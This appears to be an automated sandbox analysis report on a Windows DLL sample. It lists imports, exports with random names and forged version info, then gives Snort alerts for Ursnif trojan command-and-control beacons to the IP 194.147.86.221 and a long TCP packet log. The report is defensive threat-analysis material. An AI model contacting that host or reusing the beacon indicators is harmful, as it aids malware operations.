                                                          KERNEL32.dllTlsAlloc, LoadLibraryW, VirtualProtectEx, GetModuleHandleW, CreateSemaphoreW, GetTempPathW, WriteConsoleW, CloseHandle, CreateFileW, OutputDebugStringW, ReadConsoleW, GetEnvironmentVariableW, InitializeCriticalSection, GetModuleFileNameW, RemoveDirectoryW, DeviceIoControl, GetCurrentProcess, EnterCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, EncodePointer, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, SetLastError, RtlUnwind, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, HeapFree, HeapAlloc, GetCurrentThread, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, GetStdHandle, GetFileType, SetConsoleCtrlHandler, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, ReadFile, DecodePointer
                                                          ole32.dllCoUninitialize, CoTaskMemAlloc, CoInitialize, CoTaskMemFree
                                                          CRYPTUI.dllCryptUIDlgViewContext, CryptUIDlgViewCertificateW, CryptUIWizDigitalSign, CryptUIWizFreeDigitalSignContext, CryptUIWizImport, CryptUIWizExport, CryptUIDlgSelectCertificateFromStore

                                                          Exports

                                                          NameOrdinalAddress
                                                          Bonebegin10x1003f370
                                                          Father20x1003f4d0
                                                          Ratherdesign30x1003f680
                                                          Scorematch40x1003f6f0
                                                          Silverwere50x1003f6d0
                                                          StoneNumeral60x1003f7e0

                                                          Version Infos

                                                          DescriptionData
                                                          LegalCopyright Fig Governhear suggest Corporation. All rights reserved
                                                          InternalNameRopemother Smellclean
                                                          FileVersion5.6.0.165
                                                          CompanyNameFig Governhear suggest Corporation Alsoheld
                                                          ProductNameFig Governhear suggest Shoecould Quietfrom
                                                          ProductVersion5.6.0.165
                                                          FileDescriptionFig Governhear suggest Shoecould Quietfrom
                                                          OriginalFilenameSoon.dll
                                                          Translation0x0409 0x04b0

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          10/07/21-01:32:18.233038TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977680192.168.2.4194.147.86.221
                                                          10/07/21-01:32:19.242466TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977780192.168.2.4194.147.86.221
                                                          10/07/21-01:32:19.340180TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4977880192.168.2.4194.147.86.221
                                                          10/07/21-01:32:19.340180TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977880192.168.2.4194.147.86.221
                                                          10/07/21-01:32:20.827048TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4977980192.168.2.4194.147.86.221
                                                          10/07/21-01:32:20.827048TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977980192.168.2.4194.147.86.221
                                                          10/07/21-01:32:20.886424TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4978080192.168.2.4194.147.86.221
                                                          10/07/21-01:32:20.886424TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4978080192.168.2.4194.147.86.221
                                                          10/07/21-01:32:23.671129TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4978180192.168.2.4194.147.86.221
                                                          10/07/21-01:32:23.671129TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4978180192.168.2.4194.147.86.221
                                                          10/07/21-01:34:00.834180TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4986280192.168.2.4194.147.86.221
                                                          10/07/21-01:34:00.834180TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4986280192.168.2.4194.147.86.221

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 7, 2021 01:32:18.183357000 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.232420921 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.232556105 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.233037949 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.322987080 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.712804079 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.712869883 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.712912083 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.712929010 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.712949038 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.712989092 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.713000059 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.713027000 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.713063002 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.713072062 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.713100910 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.713139057 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.713155031 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.713187933 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.713233948 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.762798071 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.762856007 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.762897968 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.762942076 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.762967110 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.762984991 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.763025999 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.763166904 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.763215065 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.763231993 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.763262033 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.763302088 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.763339043 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.763367891 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.763390064 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.763406038 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.763416052 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.763453007 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.763494968 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.763516903 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.763617039 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.803900957 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.803955078 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.803992987 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.804039001 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.804083109 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.804105997 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.804121017 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.804163933 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.804178953 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.814856052 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.814912081 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.814981937 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815020084 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815058947 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815095901 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815103054 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815177917 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815203905 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815213919 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815237045 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815288067 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815329075 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815350056 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815393925 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815401077 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815431118 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815469980 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815483093 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815506935 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815543890 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815584898 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815602064 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815624952 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815639019 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815673113 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815713882 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815751076 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815790892 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815819979 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815829992 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815835953 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815865993 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815881014 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815906048 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815943956 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815992117 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815996885 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.816034079 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.816041946 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.816071987 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.816119909 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.855792999 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855822086 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855834961 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855851889 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855871916 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855892897 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855914116 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855935097 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855957985 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855964899 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.855981112 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.856003046 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.856023073 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.856045008 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.856071949 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.865647078 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.865691900 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.865716934 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.865776062 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.865813971 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.865833044 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.865844011 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.865869999 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.865892887 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.865926981 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.865928888 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.865947008 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.865969896 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866008997 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866029024 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866065025 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866074085 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866094112 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866100073 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866125107 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866151094 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866163015 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866184950 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866206884 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866221905 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866266012 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866280079 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866290092 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866316080 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866329908 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866338968 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866360903 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866381884 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866383076 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866400003 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866420984 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866430044 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866442919 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866463900 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866485119 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866487026 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866508961 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866528034 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866528988 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866547108 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866588116 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866588116 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866611004 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866633892 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866643906 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866655111 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866668940 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866678953 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866731882 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.905524015 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905652046 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.905683041 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905710936 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905734062 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905756950 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905771971 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.905788898 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905801058 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.905812025 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905838966 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905863047 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905879974 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.905885935 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905917883 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.905925035 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905947924 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905977964 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916292906 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916331053 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916353941 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916379929 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916399002 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916404963 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916424990 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916434050 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916457891 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916471004 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916484118 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916508913 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916522026 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916533947 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916557074 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916558981 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916583061 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916604996 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916608095 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916635036 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916656017 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916661024 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916682959 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916706085 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916726112 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916727066 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916749954 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916755915 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916764021 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916778088 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916796923 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916807890 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916812897 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916835070 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916837931 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916853905 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916857004 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916871071 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916888952 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916888952 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916904926 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916944027 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.917934895 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.192461967 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.220047951 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.241900921 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.242019892 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.242465973 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.268841982 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.290623903 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.335150957 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.339643002 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.339732885 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.340179920 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.433278084 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.686741114 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.686785936 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.686824083 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.686866045 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.687088013 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.687247038 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.687779903 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.687796116 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.687798977 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.687869072 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.688245058 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.688307047 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.688653946 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.689049959 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.689062119 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.743098974 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743216038 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743242025 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743273973 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743350983 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743380070 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743391991 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.743405104 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743432045 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743514061 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.743583918 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743693113 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743717909 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743750095 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743778944 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743791103 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.743804932 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743830919 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743868113 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743869066 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.743894100 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743913889 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.743917942 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.743921041 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743947029 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.744018078 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.792788982 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.792815924 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.792831898 CEST8049777194.147.86.221192.168.2.4
